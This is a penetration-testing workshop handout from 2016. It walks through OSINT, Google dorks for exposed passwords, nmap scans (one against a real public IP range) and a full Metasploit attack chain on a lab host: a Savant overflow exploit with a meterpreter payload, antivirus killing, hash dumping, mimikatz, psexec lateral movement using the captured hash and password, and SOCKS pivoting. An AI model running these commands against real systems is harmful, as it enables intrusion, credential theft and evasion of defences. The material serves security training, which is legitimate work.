################################
# Pentester Night School 2016 #
# By Joe McCray #
################################
##########
# VMWare #
##########
- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
##########################
# Download the attack VM #
##########################
VM for these labs
-----------------
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
user: strategicsec
pass: strategicsec
---------------------------------------------------------------------------------------------------------------------------------
################################
# Tactical Pentest Methodology #
################################
The purpose of this section of the Pastebin document is to provide you with a tactical pentest plan.
-=-=-=-=-=- Phase 1 -=-=-=-=-=-
##########################################
# Step 1: External Target Identification #
##########################################
Find all of the IP ranges owned by your target company via the following websites:
- https://www.robtex.com/
- http://toolbar.netcraft.com/site_report
Look for weak SSL implementations
- https://www.ssllabs.com/ssltest/
#############################
# Step 2: Google Quick Hits #
#############################
Be thorough, and really look for vulnerabilities and data leakages that are relevant to what you learned while doing your OSINT work.
https://www.exploit-db.com/google-hacking-database/
Really good google dorks to use:
site:yourtarget.com filetype:pcf
site:yourtarget.com filetype:ica
1. Footholds:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=1&ghdb_search_text=
Be sure to use 'site:yourtarget.com' [ google dork for the site above ]
2. Passwords:
-------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=9&ghdb_search_text=
Be sure to use 'site:yourtarget.com' [ google dork for the site above ]
3. Sensitive Directories:
-------------------------
https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=3&ghdb_search_text=
Be sure to use 'site:yourtarget.com' [ google dork for the site above ]
Make sure that you do at least 50-100 different Google dorks. Do no less than 10 dorks per category.
###########################
# Step 3: Compromise Data #
###########################
Look to see if they have already been breached
Search for the target company (and their major competitors) in the Data Breach Database
http://www.privacyrights.org/data-breach
Place targetgcompany.com in the search box of the link below to look known breaches
http://zone-h.com/search
Replace targetgcompany.com with your target domain name to look for known XSS vulnerabilities in the site.
http://xssed.com/search?key=targetcompany.com
##############################
# Step 4: Build OSINT Report #
##############################
Passive Recon
-------------
Install this add-on and enumerate as much info as possible
- https://addons.mozilla.org/en-US/firefox/addon/passiverecon/
Next we build at an OSINT report with the data gleaned from the previous steps:
https://s3.amazonaws.com/StrategicSec-Files/OSINT_Innophos_11242010.doc
We looked through this to get an idea of what is not only involved in doing passive recon, but what the actual output of the work should look like.
---------------------------------------------------------------------------------------------------------------------------------
-=-=-=-=-=- Phase 2 -=-=-=-=-=-
##########################
# Download the attack VM #
##########################
VM for these labs
-----------------
https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
user: strategicsec
pass: strategicsec
############################################
# Identifying External Security Mechanisms #
############################################
sudo /sbin/iptables -F
strategicsec
cd /home/strategicsec/toolz
###########################
# Target IP Determination #
###########################
cd /home/strategicsec/toolz
perl blindcrawl.pl -d targetgcompany.com
-- Take each IP address and look ip up here:
http://www.networksolutions.com/whois/index.jsp
cd ~/toolz/fierce2
fierce -dns targetgcompany.com
cd ..
cd ~/toolz/
./ipcrawl 148.87.1.1 148.87.1.254 (DNS forward lookup against an IP range)
sudo nmap -sL 148.87.1.0-255
strategicsec
sudo nmap -sL 148.87.1.0-255 | grep oracle
strategicsec
sudo nmap -p 443,444,8443,8080,8088 --script=ssl-cert --open 148.87.1.0-255
strategicsec
Reference:
http://blog.depthsecurity.com/2012/01/obtaining-hostdomain-names-through-ssl.html
###########################
# Load Balancer Detection #
###########################
Here are some command-line options to use for identifying load balancers:
dig google.com
cd ~/toolz
./lbd-0.1.sh targetgcompany.com
halberd targetgcompany.com
######################################
# Web Application Firewall Detection #
######################################
cd ~/toolz/wafw00f
python wafw00f.py http://www.targetgcompany.com
cd ~/toolz/
sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com
strategicsec
sudo nmap -p 80 --script http-waf-detect.nse targetgcompany.com
strategicsec
---------------------------------------------------------------------------------------------------------------------------------
-=-=-=-=-=- Phase 3 -=-=-=-=-=-
Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.
So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
https://s3.amazonaws.com/StrategicSec-Files/Strategic-Security-2016-VPN-Info.pdf
sudo nmap -sP 10.0.0.0/24
sudo nmap -sL 10.0.0.0/24
cd ~/toolz
wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
gcc ipcrawl.c -o ipcrawl
chmod 777 ipcrawl
./ipcrawl 10.0.0.1 10.0.0.254
wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
gcc propecia.c propecia
sudo cp propecia /bin
propecia 10.0.0 22
propecia 10.0.0 3389
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt
cd ~/toolz
wget http://wkhtmltopdf.googlecode.com/files/wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
tar -jxvf wkhtmltoimage-0.11.0_rc1-static-i386.tar.bz2
sudo cp wkhtmltoimage-i386 /usr/local/bin/
git clone git://github.com/SpiderLabs/Nmap-Tools.git
cd Nmap-Tools/NSE/
sudo cp http-screenshot.nse /usr/share/nmap/scripts/
sudo nmap --script-updatedb
cd ~/toolz/
mkdir labscreenshots
cd labscreenshots/
sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/strategicsec/labnet-ip-list.txt
vi screenshots.sh
#!/bin/bash
printf "
" > labnet-port-80-screenshots.html
ls -1 *.png | awk -F : '{ print $1":"$2"\n
![](\""$1"%3A"$2"\")
"}' >> labnet-port-80-screenshots.html
printf "" >> labnet-port-80-screenshots.html
sh screenshots.sh
##########################
# Nmap NSE tricks to try #
##########################
sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24
sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24
sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24
sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24
sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24
sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24
sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24
sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24
sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24
sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
####################################
# Finally, let's exploit something #
####################################
nmap -Pn -sV -T 5 -oG - -p 80,8080 10.0.0.* | awk '/open/{print $2}'
nmap -Pn -sV -T 5 -p 80,8080 10.0.0.15
https://www.exploit-db.com/search
Search for:
Savant httpd 3.1
Apache httpd 2.0.58 ((Win32))
Found one written in Python:
https://www.exploit-db.com/exploits/18401/
Found one for Savant 3.1 from Metasploit:
https://www.exploit-db.com/exploits/16770/
cd ~/toolz/metasploit
./msfconsole
use exploit/windows/http/savant_31_overflow
set RHOST 10.0.0.15
set PAYLOAD windows/meterpreter/bind_nonx_tcp
set RPORT 80
set LPORT 7777
exploit
********************************** Figure out who and where you are **********************************
meterpreter> sysinfo
meterpreter> getuid
meterpreter> ipconfig
meterpreter> run post/windows/gather/checkvm
meterpreter> run get_local_subnets
********************************** Escalate privileges and get hashes **********************************
meterpreter> use priv
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
--------------------------------------------------------
meterpreter> run killav
meterpreter> run post/windows/gather/hashdump
Got the following admin hash:
Administrator:500:6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363:::
meterpreter> run post/windows/gather/credentials/credential_collector
meterpreter > load mimikatz
meterpreter > kerberos
This should give me the administrative password:
)K5?Jocb(Yx
********************************** Enumerate the host you are on **********************************
meterpreter> run winenum
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/usb_history
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/enum_snmp
meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
********************************** Get out of Meterpreter **********************************
meterpreter> background
msf exploit(savant_31_overflow) > back
msf>
********************************** Lateral Movement *******************************
Now we can run the PSEXEC exploit.
-- Option 1:
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass )K5?Jocb(Yx
set RHOST 10.0.0.15
set payload windows/meterpreter/bind_tcp
set LPORT 2345
exploit
********************************** Get out of Meterpreter **********************************
meterpreter> background
msf exploit(psexec) >back
msf>
**********************************
-- Option 2:
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass 6e0b0669e734d66b310cc3b8f65453da:8a2b05f1b6111fe3d642bb43e1c0c363
set payload windows/meterpreter/bind_tcp
set RHOST 10.0.0.15
set LPORT 5678
exploit
********************************** Set up your Pivot **********************************
meterpreter > background
<-- background the session
You want to get back to this prompt:
msf exploit(handler) > back <--- you need to get to main msf> prompt
sessions -l <--find a session you want to pivot through (note the IP and session number)
Now set up Pivot with a route add
---------------------------------
route print <--- should be blank
route add 10.0.0.15 255.255.255.0 1 <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)
route print <----- verify new route
******************************Scan through your Pivot ******************************
use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot
set THREADS 10
set RHOSTS 10.0.0.0/24 <-- Keep changing this IP and re-running the scan until you find something you want to attack
set PORTS 445
run
####################################
# Socks Tunneling with Proxychains #
####################################
--- Open a duplicate putty session to your Ubuntu host
sudo apt-get install -y proxychains
strategicsec
sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 1080
Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
socks4 127.0.0.1 1080
***************************Set up a Socks Proxy through your Pivot *************************
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT 1080
run
--- Go back to your other putty session with the meterpreter shell
cd ~
proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24 <--- This is going to be really slow
proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 10.0.0/24 <--- This is going to be really slow
---close the duplicate putty session to your Ubuntu host